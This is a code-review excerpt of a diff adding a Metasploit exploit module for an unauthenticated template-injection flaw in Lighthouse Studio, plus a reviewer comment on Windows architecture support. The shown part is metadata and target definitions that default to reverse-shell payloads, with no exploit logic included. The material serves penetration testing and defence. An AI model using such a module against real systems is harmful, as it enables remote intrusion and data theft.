modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb

```diff
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)",
+        'Description' => %q{
+          This module exploits a template injection vulnerability in the
+          Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.
+          The application fails to properly sanitize user input within survey templates,
+          allowing unauthenticated attackers to inject and execute arbitrary Perl commands
+          on the target system.
+
+          This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
+          Successful exploitation may result in remote code execution under the privileges
+          of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+          An attacker can execute arbitrary system commands as the web server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'Adam Kues' # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2025-34300'],
+          ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/']
+        ],
+        'Platform' => ['multi'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :nix_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ARCH_CMD],
+              'Type' => :nix_command,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64],
```

Comment:
```suggestion
              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
```
To my knowledge, we do not support `ARCH_ARMLE` binary for Windows.  I think Windows RT was ARMLE, and I _think_ Windows CE can be compiled for ARMLE, but we don't support them.  AARCH64 for Windows has 1 binary payload (as of 2 weeks ago, I believe).